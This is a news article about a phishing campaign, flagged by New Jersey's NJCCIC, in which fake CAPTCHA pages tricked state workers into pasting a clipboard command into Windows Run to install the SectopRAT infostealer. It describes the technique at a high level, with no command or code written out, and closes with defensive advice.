Fake CAPTCHA pages tricked users into pasting malware-laced commands into Windows Run, launching stealth attacks that silently deployed infostealers undetected.
Fake CAPTCHA Forces Users to Run Malware Disguised as Verification Text
This article was published more than a year ago. Some information may no longer be current.
WRITTEN BY
SHARE
Deceptive CAPTCHA Pages Deploy Stealth Malware Using Windows Run Exploit
Cybersecurity analysts in New Jersey flagged an alarming malware scheme this week targeting government employees through fraudulent CAPTCHA challenges. The New Jersey Cybersecurity and Communications Integration Cell (NJCCIC) revealed on March 20 that the attackers sent emails to state workers containing links to deceptive or compromised websites posing as security checks. According to NJCCIC:
The emails contain links directing targets to malicious or compromised websites and prompting deceptive CAPTCHA verification challenges.
These challenges were designed to fool users into running dangerous commands that secretly installed the SectopRAT infostealer.
The method was particularly sophisticated, using a clipboard-based trick to conceal its intent. Victims who clicked on the link were directed to a fake CAPTCHA page that automatically copied a command. The website then instructed users to paste the command into the Windows Run dialog as part of a supposed verification step. Although the final part of the pasted text read like a standard message—“I am not a robot – reCAPTCHA Verification ID: ####”—executing the command in fact launched mshta.exe, a legitimate Windows executable used to fetch and run malware disguised in common file types.
NJCCIC traced the campaign to compromised sites that used widely adopted tools: “Further analysis indicated that the identified compromised websites used technologies such as the WordPress Content Management System (CMS) platform and JavaScript Libraries.”
The investigation also uncovered a supply chain component targeting auto dealership websites via a compromised video service. Infected visitors risked downloading the same infostealer. Meanwhile, cybersecurity researchers documented related operations distributing other malware types:
Researchers also discovered similar fake CAPTCHA malware campaigns deploying Lumma and Vidar infostealers and stealthy rootkits. Legitimate CAPTCHA verification challenges validate a user’s identity and do not require users to copy and paste commands or output into a Windows Run dialog box.
Officials advised system administrators to update software, strengthen CMS credentials, and report incidents to the FBI’s Internet Crime Complaint Center and NJCCIC.
